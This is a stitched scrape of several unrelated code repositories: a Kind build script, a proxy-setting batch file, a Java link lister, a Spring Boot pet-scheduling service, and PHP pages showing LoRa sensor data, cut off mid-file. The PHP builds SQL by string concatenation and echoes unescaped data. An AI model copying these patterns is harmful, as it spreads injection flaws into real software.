//var {fmc_to_js, fmc_to_hs} = require("./../../FormCoreJS");
var kind_path = path.join(__dirname, "js/src/kind.js");
process.chdir(path.join(__dirname, "../base"));
// Restores last kind.js from git in case we destroyed it
execSync("git checkout "+kind_path);
// Creates kind.js
console.log("Generating kind.js");
execSync("kind Kind.api.export --js --module | js-beautify >> "+kind_path+".tmp");
execSync("mv "+kind_path+".tmp "+kind_path);
<file_sep>/.github/ISSUE_TEMPLATE/bug_report.md
---
name: 🐛 Bug report
about: Create a report to help us improve
title: ''
labels: bug
assignees: ''
---
### Describe the bug
A clear and concise description of what the bug is. You can paste the code and error to help us see the context.
### To Reproduce
Steps to reproduce the behavior:
1. Write the code on '...'
2. Use the command '...'
### Expected behavior
A clear and concise description of what you expected to happen.
### Environment (please complete the following information):
- OS: [e.g. iOS]
- Kind version [e.g. kind@1.0.53]
### Additional context
Add any other context about the problem here.
|
814a13e5bb91d9796d61aed099573d0cc07875ae
|
[
"JavaScript",
"Makefile",
"Markdown",
"Shell"
] | 25
|
JavaScript
|
Kix205/Kind
|
d7709263b45606a249a4f4e952122e58f8c28e4f
|
856826c94ac8360e6787b518a16ba96fc5143e9e
|
refs/heads/master
|
<file_sep>package juliostepstone;
import org.jsoup.Jsoup;
import org.jsoup.helper.Validate;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;
import java.io.IOException;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;
import java.util.Scanner;
/**
* StepStone:
*
* Program to list links from a URL.
*
* @author Julio.
*/
public class ListLinks {
public static Scanner scan= null;
public static Controller controller= null;
public static Elements links = null;
public static void main(String[] args) throws IOException {
//Declarations
scan = new Scanner (System.in);
System.out.println("Escribe la web http: ");
String url= scan.nextLine();
controller = new Controller(url);
links = controller.loadLink(url);
controller.showLinks(links);
}
}
|
225dc045ad8ed243e62933cd64edbe4d37fa59d6
|
[
"Java"
] | 1
|
Java
|
deyko/StepStoneJulio
|
6166b77904f2baad88436505fe14612b19a2a988
|
90697dbffab98a525fba8e43ef8c42efeeb77f81
|
refs/heads/master
|
<file_sep># Tools
## SetProxy
set the machine proxy according to predefined settings
### How to use:
`setproxy.bat $1` - set proxy parameters for git/npm
$1 - work/home
## GitConfig
set your project gitconfig file with predefined settings
### How to use:
`git init --template=<path_to_gitconfig_folder>`
<file_sep>#!/bin/bash
echo "Setting proxy settings to $1"
if [ $1 == "home" ]
then
setx HTTP_PROXY "" -m
setx HTTPS_PROXY "" -m
else
setx HTTPS_PROXY http://proxy.wdf.sap.corp:8080 -m
setx HTTP_PROXY http://proxy.wdf.sap.corp:8080 -m
fi
|
8520343efaecd1038c8fcda6259c9cde008835b3
|
[
"Markdown",
"Shell"
] | 2
|
Markdown
|
adibiton/Tools
|
d5ecf69b0b741c8ca4438037c68c03cb275e6f28
|
abdd8e1d1f31f1e3868c5baa3d8fee1a063d081f
|
refs/heads/master
|
<repo_name>Leo70kg/Critter-Chronologer<file_sep>/src/main/java/com/udacity/jdnd/course3/critter/exception/OwnerNotFoundException.java
package com.udacity.jdnd.course3.critter.exception;
import org.springframework.http.HttpStatus;
import org.springframework.web.bind.annotation.ResponseStatus;
@ResponseStatus(value = HttpStatus.NOT_FOUND, reason = "Owner not found")
public class OwnerNotFoundException extends RuntimeException{
}
<file_sep>/src/main/java/com/udacity/jdnd/course3/critter/service/ScheduleService.java
package com.udacity.jdnd.course3.critter.service;
import com.udacity.jdnd.course3.critter.entity.Customer;
import com.udacity.jdnd.course3.critter.entity.Employee;
import com.udacity.jdnd.course3.critter.entity.Pet;
import com.udacity.jdnd.course3.critter.entity.Schedule;
import com.udacity.jdnd.course3.critter.exception.CustomerNotFoundException;
import com.udacity.jdnd.course3.critter.repository.CustomerRepository;
import com.udacity.jdnd.course3.critter.repository.EmployeeRepository;
import com.udacity.jdnd.course3.critter.repository.PetRepository;
import com.udacity.jdnd.course3.critter.repository.ScheduleRepository;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
@Service
public class ScheduleService {
@Autowired
ScheduleRepository scheduleRepository;
@Autowired
PetRepository petRepository;
@Autowired
EmployeeRepository employeeRepository;
@Autowired
CustomerRepository customerRepository;
public Schedule addSchedule(Schedule schedule) {
return scheduleRepository.save(schedule);
}
public List<Schedule> getAllSchedules() {
return scheduleRepository.findAll();
}
public List<Schedule> getSchedulesByPet(Pet pet) {
return scheduleRepository.getSchedulesByPets(pet);
}
public List<Schedule> getScheduleByEmployeeId(Long employeeId) {
Employee employee = employeeRepository.getOne(employeeId);
return scheduleRepository.getSchedulesByEmployees(employee);
}
public List<Schedule> getScheduleByCustomerId(Long customerId) {
List<Schedule> scheduleList = new ArrayList<>();
Optional<Customer> customer = customerRepository.findById(customerId);
if (!customer.isPresent()) {
throw new CustomerNotFoundException();
}
List<Pet> petList = petRepository.findPetsByCustomerEquals(customer.get());
petList.forEach(pet -> scheduleList.addAll(scheduleRepository.getSchedulesByPets(pet)));
return scheduleList;
}
}
<file_sep>/src/main/java/com/udacity/jdnd/course3/critter/schedule/ScheduleController.java
package com.udacity.jdnd.course3.critter.schedule;
import com.udacity.jdnd.course3.critter.entity.Employee;
import com.udacity.jdnd.course3.critter.entity.Pet;
import com.udacity.jdnd.course3.critter.entity.Schedule;
import com.udacity.jdnd.course3.critter.service.EmployeeService;
import com.udacity.jdnd.course3.critter.service.PetService;
import com.udacity.jdnd.course3.critter.service.ScheduleService;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.*;
import java.util.ArrayList;
import java.util.List;
import java.util.stream.Collectors;
/**
* Handles web requests related to Schedules.
*/
@RestController
@RequestMapping("/schedule")
public class ScheduleController {
@Autowired
ScheduleService scheduleService;
@Autowired
EmployeeService employeeService;
@Autowired
PetService petService;
@PostMapping
public ScheduleDTO createSchedule(@RequestBody ScheduleDTO scheduleDTO) {
return convertScheduleToScheduleDTO(scheduleService.addSchedule(convertScheduleDTOToSchedule(scheduleDTO)));
}
@GetMapping
public List<ScheduleDTO> getAllSchedules() {
List<Schedule> scheduleList = scheduleService.getAllSchedules();
return convertScheduleToScheduleDTO(scheduleList);
}
@GetMapping("/pet/{petId}")
public List<ScheduleDTO> getScheduleForPet(@PathVariable long petId) {
Pet pet = petService.getPetById(petId);
List<Schedule> scheduleList = scheduleService.getSchedulesByPet(pet);
return convertScheduleToScheduleDTO(scheduleList);
}
@GetMapping("/employee/{employeeId}")
public List<ScheduleDTO> getScheduleForEmployee(@PathVariable long employeeId) {
return convertScheduleToScheduleDTO(scheduleService.getScheduleByEmployeeId(employeeId));
}
@GetMapping("/customer/{customerId}")
public List<ScheduleDTO> getScheduleForCustomer(@PathVariable long customerId) {
return convertScheduleToScheduleDTO(scheduleService.getScheduleByCustomerId(customerId));
}
private ScheduleDTO convertScheduleToScheduleDTO(Schedule schedule){
ScheduleDTO scheduleDTO = new ScheduleDTO();
BeanUtils.copyProperties(schedule, scheduleDTO);
List<Long> petIds = schedule.getPets().stream().map(Pet::getId).collect(Collectors.toList());
List<Long> employeeIds = schedule.getEmployees().stream().map(Employee::getId).collect(Collectors.toList());
scheduleDTO.setPetIds(petIds);
scheduleDTO.setEmployeeIds(employeeIds);
return scheduleDTO;
}
private Schedule convertScheduleDTOToSchedule(ScheduleDTO scheduleDTO){
Schedule schedule = new Schedule();
BeanUtils.copyProperties(scheduleDTO, schedule);
List<Employee> employeeList = scheduleDTO.getEmployeeIds().stream().map(employeeService::getEmployeeById).collect(Collectors.toList());
List<Pet> petList = scheduleDTO.getPetIds().stream().map(petService::getPetById).collect(Collectors.toList());
schedule.setEmployees(employeeList);
schedule.setPets(petList);
return schedule;
}
private List<ScheduleDTO> convertScheduleToScheduleDTO(List<Schedule> scheduleList) {
List<ScheduleDTO> scheduleDTOList = new ArrayList<>();
for (Schedule schedule: scheduleList) {
scheduleDTOList.add(convertScheduleToScheduleDTO(schedule));
}
return scheduleDTOList;
}
}
<file_sep>/src/main/java/com/udacity/jdnd/course3/critter/user/UserController.java
package com.udacity.jdnd.course3.critter.user;
import com.udacity.jdnd.course3.critter.entity.Customer;
import com.udacity.jdnd.course3.critter.entity.Employee;
import com.udacity.jdnd.course3.critter.entity.Pet;
import com.udacity.jdnd.course3.critter.pet.PetDTO;
import com.udacity.jdnd.course3.critter.service.CustomerService;
import com.udacity.jdnd.course3.critter.service.EmployeeService;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.*;
import java.time.DayOfWeek;
import java.util.ArrayList;
import java.util.List;
import java.util.Set;
/**
* Handles web requests related to Users.
*
* Includes requests for both customers and employees. Splitting this into separate user and customer controllers
* would be fine too, though that is not part of the required scope for this class.
*/
@RestController
@RequestMapping("/user")
public class UserController {
@Autowired
CustomerService customerService;
@Autowired
EmployeeService employeeService;
@PostMapping("/customer")
public CustomerDTO saveCustomer(@RequestBody CustomerDTO customerDTO){
Customer savedCustomer = customerService.addCustomer(convertCustomerDTOToCustomer(customerDTO));
return convertCustomerToCustomerDTO(savedCustomer);
}
@GetMapping("/customer")
public List<CustomerDTO> getAllCustomers(){
List<Customer> customerList = customerService.getAllCustomers();
List<CustomerDTO> customerDTOList = new ArrayList<>();
for (Customer customer: customerList) {
customerDTOList.add(convertCustomerToCustomerDTO(customer));
}
return customerDTOList;
}
@GetMapping("/customer/pet/{petId}")
public CustomerDTO getOwnerByPet(@PathVariable long petId){
return convertCustomerToCustomerDTO(customerService.getCustomerByPetId(petId));
}
@PostMapping("/employee")
public EmployeeDTO saveEmployee(@RequestBody EmployeeDTO employeeDTO) {
return convertEmployeeToEmployeeDTO(employeeService.addEmployee(convertEmployeeDTOToEmployee(employeeDTO)));
}
@GetMapping("/employee/{employeeId}")
public EmployeeDTO getEmployee(@PathVariable long employeeId) {
return convertEmployeeToEmployeeDTO(employeeService.getEmployeeById(employeeId));
}
@PutMapping("/employee/{employeeId}")
public void setAvailability(@RequestBody Set<DayOfWeek> daysAvailable, @PathVariable long employeeId) {
employeeService.setAvailabilityById(daysAvailable, employeeId);
}
@GetMapping("/employee/availability")
public List<EmployeeDTO> findEmployeesForService(@RequestBody EmployeeRequestDTO employeeDTO) {
List<Employee> employeeList = employeeService.getEmployeeService(employeeDTO);
List<EmployeeDTO> employeeDTOList = new ArrayList<>();
for (Employee employee: employeeList) {
employeeDTOList.add(convertEmployeeToEmployeeDTO(employee));
}
return employeeDTOList;
}
private CustomerDTO convertCustomerToCustomerDTO(Customer customer) {
CustomerDTO customerDTO = new CustomerDTO();
BeanUtils.copyProperties(customer, customerDTO);
List<Pet> petSet = customer.getPets();
List<Long> petIdList = new ArrayList<>();
if (petSet != null) {
for (Pet pet: petSet) {
petIdList.add(pet.getId());
}
}
customerDTO.setPetIds(petIdList);
return customerDTO;
}
private Customer convertCustomerDTOToCustomer(CustomerDTO customerDTO){
Customer customer = new Customer();
BeanUtils.copyProperties(customerDTO, customer);
return customer;
}
private EmployeeDTO convertEmployeeToEmployeeDTO(Employee employee){
EmployeeDTO employeeDTO = new EmployeeDTO();
BeanUtils.copyProperties(employee, employeeDTO);
return employeeDTO;
}
private Employee convertEmployeeDTOToEmployee(EmployeeDTO employeeDTO) {
Employee employee = new Employee();
BeanUtils.copyProperties(employeeDTO, employee);
return employee;
}
}
|
bb2ed0aaf6d705169d0a79e0c1d3f3144dbeceef
|
[
"Java"
] | 4
|
Java
|
Leo70kg/Critter-Chronologer
|
77ab5eed20dce175ac6ea72a720072a61d87a05c
|
c06b61052f772efce2d281676e11693c3928a2e6
|
refs/heads/master
|
<file_sep><?php
include('db.php');
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
$limit = '';
if(isset($_REQUEST['limit'])) {
$limit = $_REQUEST['limit'];
}
$daysback = 0;
if(isset($_REQUEST['daysback'])) {
if(is_numeric($_REQUEST['daysback'])) {
$daysback = abs(addslashes($_REQUEST['daysback']));
$startDay = $daysback*-1 - 1;
}
}
if(!isset($_REQUEST['admin'])) {
if(in_array($_REQUEST['id'], $GLOBALS['nodefilter'])) {
die('oops, deze pagina is niet beschikbaar');
}
}
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<meta http-equiv="refresh" content="60">
<?php
include('headinclude.php');
?>
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
</head>
<body>
<?php
include('menu.php');
echo '<div class="container-fluid">'."\n";
$sql = 'SELECT * FROM node WHERE id = '.addslashes($_REQUEST['id']);
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
//var_dump($row);
$arrPoints = null;
$sql1 = 'SELECT point.id AS \'Id\', point.name AS \'Name\', unit.Unit AS \'Unit\' FROM point, unit WHERE point.Nodeid = '.addslashes($row['Id']).' AND point.Unitid = unit.Id';
//echo $sql.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$arrPoints[] = array('id' => $row1['Id'], 'name' => $row1['Name'], 'unit' => $row1['Unit']);
}
if($arrPoints != null) {
$sql2 = '';
foreach($arrPoints as $point) {
if($sql2 != '') {
$sql2 .= ' UNION ';
}
$sql2 .= 'SELECT \''.$point['id'].'\' AS \'Tagid\', Moment, Tagvalue FROM measurement'.$point['id'];
if($daysback == 0) {
$sql2 .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL -1 DAY)';
} else {
$sql2 .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL '.$startDay.' DAY) AND Moment < DATE_ADD(NOW(), INTERVAL -'.$daysback.' DAY)';
}
}
$sql2 .= ' ORDER BY Moment DESC, Tagid ASC';
//echo $sql2;
$lastData = null;
$i = -1;
$result2 = mysqlquery($sql2);
while ($row2 = mysqli_fetch_array($result2))
{
//var_dump($row2);
if($lastData != $row2['Moment']) {
$i++;
$lastData = $row2['Moment'];
}
$data[$i]['Moment'] = $row2['Moment'];
$data[$i][$row2['Tagid']] = $row2['Tagvalue'];
}
} else {
echo 'Geen data beschikbaar';
}
//var_dump($data);
echo '<h1>'.$row['Name'].'</h1>'."\n";
echo '<iframe src="'.$GLOBALS['urldata'].'chartnode.php?id='.$_REQUEST['id'].'&limit='.$limit.'&daysback='.$daysback.'" frameborder="0" height="300" width="100%" scrolling="no"></iframe>';
echo '<br/><a href="'.$GLOBALS['urldata'].'node.php?id='.$_REQUEST['id'].'&daysback='.abs($daysback+1);
if(isset($_GET['admin'])) {
echo '&admin=1';
}
echo '"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-chevron-left"></button></a><a href="'.$GLOBALS['urldata'].'node.php?id='.$_REQUEST['id'];
if(isset($_GET['admin'])) {
echo '&admin=1';
}
echo '"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-stop"></button></a>';
if($daysback > 0) {
echo '<a href="'.$GLOBALS['urldata'].'node.php?id='.$_REQUEST['id'].'&daysback='.abs($daysback-1);
if(isset($_GET['admin'])) {
echo '&admin=1';
}
echo '"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-chevron-right"></button></a><br/><br/>'."\n";
} else {
echo '<button type="button" class="btn btn-default" disabled="true"><span class="glyphicon glyphicon-chevron-right"></button><br/><br/>'."\n";
}
echo '<a href="https://apeldoornindata.nl/data/nodeexport.php?id='.$_REQUEST['id'].'&limit=2000"><img src="https://apeldoornindata.nl/images/csv.png" alt="CSV export"></a><br/><br/>'."\n";
if(in_array($_REQUEST['id'], array(87, 120))) {
echo 'Deze sensor hangt in vergaderzaak 1B bij Hollander Techniek in Apeldoorn.<br/><br/>';
echo 'Kijk voor meer informatie over IoT bij Hollander Techniek op <a href="https://www.iotinsights.nl/" target="_blank">iotinsights.nl</a><br/>';
echo '<h3>Luchtvochtigheid (Rode lijn)</h3>
Zowel thuis als op kantoor zou de relatieve luchtvochtigheid tussen de 40 en 60 procent moet liggen.<br/>
Bij een te lage luchtvochtigheid krijgen veel mensen last van geïrriteerde luchtwegen, barstjes in de lippen, droge ogen of soms zelfs huidklachten.<br/>
Een te hoge luchtvochtigheid kan schimmel veroorzaken.<br/>
<h3>CO2 (Paarse lijn)</h3>
Herken je een bedompte lucht, benauwde atmosfeer of nare luchtjes? Kijk dan eens naar de CO2 waarde.<br/>
Een goede kwaliteit binnenlucht bevat minder dan 0,1 volume procent CO2 (1000 ppm)<br/>
<br/>
<img src="../images/co2.png" /><br/>
<h3>Temperatuur (Donker blauwe lijn)</h3>
22 graden levert de beste prestaties op op de werkvloer. Voor vrouwen zou het zelfs om 24,5 graden gaan.<br/>
De ideale kamertemperatuur voor een gemengd bedrijf zou dus rond de 23 graden liggen.<br/>
<h3>Lichtintensiteit (Oranje lijn)</h3>
Licht beïnvloedt de stemming, eetlust en alertheid. Daglicht zorgt voor de beste productiviteit.<br/>
In een vergaderruimte is minimaal 500 lux wenselijk. Heb je een creatieve sessie? Zet het lucht gerust wat zachter.<br/>
Schermerlicht zorgt volgens onderzoek voor meer vindingrijkheid!<br/>
<h3>Beweging (Groene lijn)</h3>
Is er iemand aanwezig geweest in de ruimte? Dit kun je zien aan de beweging sensor.<br/>
Is er een periode lang geen beweging geweest, dan is de ruimte ook niet gebruikt.<br/>
<h3>Batterijspanning (Lichtblauwe lijn)</h3>
De sensor werk met LoRa technologie. De enige voeding is een batterij. Wel zo handig om de spanning te weten, zodat je de batterij tijdig kunt vervangen.<br/><br/><br/>';
}
echo '<table border="1">'."\n";
echo '<tr><th>Moment</th>';
//var_dump($arrPoints);
foreach((array) $arrPoints as $point) {
//var_dump($point);
echo '<th>'.$point['name'].' ['.$point['unit'].']</th>';
}
echo '</tr>'."\n";
//var_dump($data);
if(isset($data)) {
foreach($data as $dataMoment) {
echo '<tr>';
echo '<td>'.$dataMoment['Moment'].'</td>';
foreach($arrPoints as $point) {
echo '<td class="alnright">';
if(array_key_exists($point['id'], $dataMoment)) {
$waarde = str_replace('0000', '', str_replace('.00000', '', $dataMoment[$point['id']]));
if(substr($waarde, -3) == '000'){
$waarde = substr($waarde, 0, -3);
}
if($waarde == '') {
$waarde = 0;
}
echo $waarde;
} else {
echo ' ';
}
//echo $dataMoment[$point['id']];
echo '</td>';
}
echo '</tr>'."\n";
}
} else {
echo '<tr><td>Geen data</td></tr>'."\n";
}
echo '</table>'."\n";
}
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
</body>
</html><file_sep><?php
include('db.php');
if(isset($_REQUEST['id'])) {
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
}
$sql = 'SELECT * FROM node';
//echo $sql;
$interval = 'INTERVAL 24 HOUR';
if(isset($_REQUEST['select'])) {
if($_REQUEST['select'] == 'all') {
$interval = 'INTERVAL 14 DAY';
}
}
$arrSensorData = array("type" => "FeatureCollection", "features" => array());
$arrMeasurement = array();
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$nodeHasData = false;
$arrMeasurementItem = null;
$arrProperties = array();
$sql1 = 'SELECT point.*, unit.Unit FROM point INNER JOIN unit ON point.Unitid = unit.Id WHERE Nodeid = '.$row["Id"];
//echo $sql1;
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'SELECT * FROM measurement'.$row1["Id"].' WHERE Moment >= DATE_SUB(NOW(), '.$interval.') ORDER BY Moment DESC LIMIT 1';
//echo $sql2;
$result2 = mysqlquery($sql2);
while ($row2 = mysqli_fetch_array($result2))
{
//var_dump($row1);
$arrProperties = null;
$arrProperties["type"] = "sensor";
$arrProperties["id"] = $row1["Id"];
$arrProperties["location"] = $row["Name"];
$arrProperties["name"] = $row1["Name"];
$arrProperties["value"] = ($row2["Tagvalue"] + 0).' '.$row1["Unit"];
$arrProperties["timestamp"] = $row2["Moment"];
$arrProperties["nodeid"] = $row["Id"];
$arrMeasurementItem["properties"][] = $arrProperties;
$nodeHasData = true;
}
}
//var_dump($arrProperties);
$arrMeasurementItem["type"] = "Feature";
$arrMeasurementItem["name"] = $row["Name"];
$arrMeasurementItem["geometry"] = array("type" => "Point", "coordinates" => array(floatval($row["Lastlocationlon"]), floatval($row["Lastlocationlat"])));
//arrSensorData["features"][] = array("type" => "Feature");
//var_dump($row);
if($nodeHasData)
{
$arrMeasurement[] = $arrMeasurementItem;
}
}
$arrSensorData["features"] = $arrMeasurement;
echo json_encode($arrSensorData, JSON_PRETTY_PRINT);
exit();
?>
{
"type": "FeatureCollection",
"features": [{
"type": "Feature",
"properties": {
"type": "sensor",
"id": "1",
"temperature": "24.9375",
"humidity": "30.3125",
"timestamp_utc": "2017-06-01 14:30:35",
"timestamp": "2017-06-01 16:30:35",
"location": "Industrial IT"
},
"geometry": {
"type": "Point",
"coordinates": [5.943877, 52.1843 ]
}
}
]
}<file_sep><?php
include('db.php');
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<meta http-equiv="refresh" content="60">
<?php
include('headinclude.php');
?>
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script type="text/javascript">
// Load the Visualization API and the piechart package.
google.charts.load('current', {'packages':['corechart']});
// Set a callback to run when the Google Visualization API is loaded.
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
var chart = new google.visualization.ColumnChart(document.getElementById('chart_div'));
var jsonData = $.ajax({
url: "chartdata.php?id=1&type=messages",
dataType: "json",
async: false
}).responseText;
options = {
chartArea : { left: 80, right: 50, top:10, bottom: 50},
vAxis: {format:'#.#'},
legend: {position: 'none'},
hAxis: {
format: 'dd/MM/yyyy HH',
},
height: 300
};
data = new google.visualization.DataTable();
data.addColumn('datetime', 'Time');
data.addColumn('number', 'Messages');
data.insertRows(0, eval(jsonData));
var date_formatter = new google.visualization.DateFormat({
pattern: "dd/MM/yyyy HH:mm"
});
date_formatter.format(data, 0);
chart.draw(data, options);
}
</script>
</head>
<body>
<?php
include('menu.php');
echo '<div class="container-fluid">'."\n";
echo '<div id="chart_div"></div>'."\n";
$sql = 'SELECT * FROM loraraw ORDER BY Moment DESC LIMIT 500';
//echo $sql;
$result = mysqlquery($sql);
echo '<table border="1">';
echo '<tr><th>Moment</th><th>Node</th><th>Counter</th><th>Payload</th><th>Metadata</th><th>Gateway</th></tr>';
while ($row = mysqli_fetch_array($result))
{
$nodeId = 0;
$jsonData = json_decode($row['Data']);
$sql1 = 'SELECT * FROM node WHERE Devid = \''.addslashes($jsonData->dev_id).'\' AND Hwserial = \''.addslashes($jsonData->hardware_serial).'\' LIMIT 1';
//echo $sql1;
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
if($row1['Id'] != null) {
$nodeId = $row1['Id'];
}
}
if(!isset($_REQUEST['admin'])) {
if(in_array($nodeId, $GLOBALS['nodefilter'])) {
continue;
}
}
$utc_date = DateTime::createFromFormat(
'Y-m-d H:i:s',
$row['Moment'],
new DateTimeZone('UTC')
);
$localTime = $utc_date;
$localTime->setTimeZone(new DateTimeZone('Europe/Amsterdam'));
echo '<tr><td valign="top">'.$localTime->format('Y-m-d H:i:s').'</td><td valign="top">';
//echo '<pre>';
//var_dump($jsonData);
if($nodeId != 0) {
echo '<a href="https://apeldoornindata.nl/data/node.php?id='.$nodeId.'">';
}
echo $jsonData->dev_id.'</a></td><td valign="top">';
echo $jsonData->counter.'</td><td valign="top">';
if(isset($jsonData->payload_fields)) {
foreach($jsonData->payload_fields as $key => $value) {
if(isset($key) && isset($value) && !is_null($key) && !is_null($value)){
echo $key;
echo ': ';
if(!is_object($value)) {
echo $value.'<br/>';
} else {
echo'##<br/>';
}
}
}
}
echo '</td>';
echo '<td valign="top">';
echo 'Time utc: '.$jsonData->metadata->time.'<br/>';
echo 'Datarate: '.$jsonData->metadata->data_rate.'<br/>';
echo 'Frequency: '.$jsonData->metadata->frequency.'<br/>';
echo 'Coding Rate: '.$jsonData->metadata->coding_rate.'<br/>';
echo '</td>';
echo '<td valign="top">';
foreach($jsonData->metadata->gateways as $key => $value) {
if(isset($value->latitude) && isset($value->longitude)) {
echo '<a href="https://www.google.nl/maps/search/'.$value->latitude.'+'.$value->longitude.'" target="_blanc">';
echo $value->gtw_id.'</a>';
}
elseif($value->gtw_id == 'eui-600194ffff078812'){
echo '<a href="https://www.google.nl/maps/search/52.184116+5.943786" target="_blanc">';
echo $value->gtw_id.'</a>';
}
else
{
echo $value->gtw_id;
}
if(isset($value->rssi)) {
echo ' - RSSI: '.$value->rssi;
}
if(isset($value->snr)) {
echo ' - SNR: '.$value->snr;
}
echo ' - Channel: '.$value->channel;
//echo '<br/>'.$value->gtw_id.'<br/>';
if($value->gtw_id == 'eui-0031552048001a03') {
echo ' - Mheen flat';
} elseif($value->gtw_id == 'eui-aa555a0000088213') {
echo ' - <NAME>';
} elseif($value->gtw_id == 'eui-aa555a0000088234') {
echo ' - <NAME>';
} elseif($value->gtw_id == 'ttn_apeldoorn_jfk2') {
echo ' - <NAME>';
} elseif($value->gtw_id == 'eui-a020a6ffff0bf72b') {
echo ' - Alex';
} elseif($value->gtw_id == 'eui-600194ffff0668a4') {
echo ' - RFSee';
} elseif($value->gtw_id == 'eui-1dee039210b8bc22') {
echo ' - Maarten-in';
} elseif($value->gtw_id == 'eui-1dee0eafc27cb263') {
echo ' - Oblivion';
} elseif($value->gtw_id == 'eui-84eb18ffffe1df5a') {
echo ' - Maarten-in 2';
} elseif($value->gtw_id == 'eui-0003ffff1d09ce86') {
echo ' - InterAct';
} elseif($value->gtw_id == 'eui-af5ee01293673410') {
echo ' - RFSee 2';
} elseif($value->gtw_id == 'pe1mew_development_gateway_1') {
echo ' - RFSee 3';
} elseif($value->gtw_id == 'pe1mew_development_gateway_2') {
echo ' - RFSee 4';
} elseif($value->gtw_id == 'pe1mew_development_gateway_3') {
echo ' - RFSee 5';
} elseif($value->gtw_id == 'eui-af5ee06136197950') {
echo ' - RFSee 6';
} elseif($value->gtw_id == 'eui-b827ebfffe0ee7c9') {
echo ' - Eddy';
} elseif($value->gtw_id == 'eui-0031552048001a06') {
echo ' - Kadaster';
} elseif($value->gtw_id == 'eui-0031552048001a06') {
echo ' - Kadaster';
} elseif($value->gtw_id == 'ttn_apeldoorn_kadaster') {
echo ' - Kadaster';
} elseif($value->gtw_id == 'ttn_apeldoorn_kadaster') {
echo ' - Kadaster';
} elseif($value->gtw_id == 'ttn_deventer_grote-kerk') {
echo ' - Deventer - Grote kerk';
} elseif($value->gtw_id == 'ttn_apeldoorn_radiokootwijk') {
echo ' - Radio Kootwijk';
} elseif($value->gtw_id == 'eui-a020a6ffff1950d9') {
echo ' - Zutphen - Coehoornsingel';
} elseif($value->gtw_id == 'eui-0000024b08030035') {
echo ' - Harderwijk - Oosteinde';
} elseif($value->gtw_id == 'ttn_apeldoorn_werkgebouw-zuid') {
echo ' - Werkgebou<NAME>';
} elseif($value->gtw_id == 'eui-aa555a0000088227') {
echo ' - Apeldoorn Stadhuis';
} elseif($value->gtw_id == 'ttn_apeldoorn_stadhuis') {
echo ' - Apeldoorn Stadhuis';
} elseif($value->gtw_id == 'eui-aa555a0000088226') {
echo ' - Politiebureau - Europaweg';
} elseif($value->gtw_id == 'ttn_apeldoorn_europaweg') {
echo ' - Politiebureau - Europaweg';
} elseif($value->gtw_id == 'eui-600194ffff078812') {
echo ' - Industrial IT';
} elseif($value->gtw_id == 'industrialit') {
echo ' - Industrial IT Ugchelen';
} elseif($value->gtw_id == 'ttn_pe1mew_gateway_1') {
echo ' - RFSee GW1';
} elseif($value->gtw_id == 'ttn_pe1mew_gateway_0') {
echo ' - RFSee GW0';
} elseif($value->gtw_id == 'eui-b827ebfffe9c2876') {
echo ' - <NAME>';
} elseif($value->gtw_id == 'ttn-gw-fma01') {
echo ' - Oosterhout - Hofkersstraat';
} elseif($value->gtw_id == 'hollander_techniek_apeldoorn') {
echo ' - Apeldoorn - <NAME>';
} elseif($value->gtw_id == 'x-connections') {
echo ' - x-connections - Landmetersveld';
} elseif($value->gtw_id == 'eui-a020a6ffff195478') {
echo ' - Apeldoorn - Landmetersveld';
} elseif($value->gtw_id == 'eui-a84041183eedffff') {
echo ' - Apeldoorn - Waldeck-Pyrmontstraat';
} elseif($value->gtw_id == 'jeng_iot') {
echo ' - Jeng IoT';
} elseif($value->gtw_id == 'cicon') {
echo ' - Cicon';
} elseif($value->gtw_id == 'eui-a020a6ffff1957a9') {
echo ' - atranco';
} elseif($value->gtw_id == 'eui-b827ebfffe01891a') {
echo ' - Amstelveen Westhove';
} else {
echo ' - Unknown';
}
echo '<br/>';
$value = null;
}
echo '</td>';
//echo '<td valign="top">'.$row['Data'].'</td>';
echo '</tr>'."\n";
}
echo '</table>';
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
</body>
</html><file_sep><?php
include('db.php');
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
if($_REQUEST['type'] == null) {
echo 'type niet ingegeven';
exit();
}
if($_REQUEST['id'] == null) {
echo 'id niet ingegeven';
exit();
}
$limit = '';
if(isset($_REQUEST['limit'])) {
if($_REQUEST['limit'] != null) {
$limit = $_REQUEST['limit'];
}
}
$daysback = 0;
if(isset($_REQUEST['daysback'])) {
if($_REQUEST['daysback'] != null) {
if(is_numeric($_REQUEST['daysback'])) {
$daysback = addslashes($_REQUEST['daysback']);
$startDay = $daysback*-1 - 1;
}
}
}
switch($_REQUEST['type']) {
case 'firstpriority':
echo '[';
$i = 0;
$tagid = 1;
